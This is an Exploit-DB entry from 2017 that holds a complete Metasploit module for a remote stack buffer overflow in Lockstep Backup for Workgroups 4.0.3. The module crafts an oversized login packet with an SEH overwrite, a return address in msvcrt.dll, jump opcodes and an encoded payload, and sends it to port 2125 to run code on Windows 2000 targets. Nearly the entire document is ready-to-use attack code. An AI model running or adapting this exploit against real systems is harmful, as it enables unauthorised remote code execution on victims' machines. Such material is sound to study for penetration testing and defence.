Lockstep Backup for Workgroups 4.0.3 - Remote Buffer Overflow (Metasploit)

EDB-ID:

42721

CVE:

N/A




Platform:

Windows

Date:

2017-09-14


require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Lockstep Backup for Workgroups <= 4.0.3',
			'Description'    => %q{
				This module exploits a stack buffer overflow found in
				Lockstep Backup for Workgroups <= 4.0.3. The vulnerability
				is triggered when sending a specially crafted packet that
				will cause a login failure.
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: $',
			'References'     =>
				[
					[ 'URL', 'http://secunia.com/advisories/50260/' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'	=> 1000,
					'BadChars' => "\x00",
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
					'EncoderOptions' =>
						{
							'BufferRegister' => 'ECX',
						},
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 
						'Windows 2000 ALL EN', 
							{ 
								# msvcrt.dll
								# pop ecx/ pop ecx/ retn
								'Ret' => 0x780146c0, 
							} 
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 11 2013'))

		register_options(
			[
				Opt::RPORT(2125),
				OptString.new('USERNAME', [ true, 'Username of victim', 'msf' ])
			], self.class )
	end

	def exploit
		connect

		uname = datastore['USERNAME']

		p =  "\x90" * 16
		p << payload.encoded

		packet = rand_text_alpha_upper(10000)
		packet[0, 8] = "BFWCA\x01\x01\x00"
		packet[8, uname.length] = "#{uname}\x00"
		packet[73, p.length] = p
		packet[7197, 4] = "\xeb\x06\x90\x90"		# jmp $+8
		packet[7201, 4] = [target.ret].pack('V')
		packet[7205, 8] = "\x90" * 8
		packet[7213, 2] = "\xff\xe7"			# jmp edi

		print_status("Trying target %s..." % target.name)

		sock.put(packet)

		handler
		disconnect
	end

end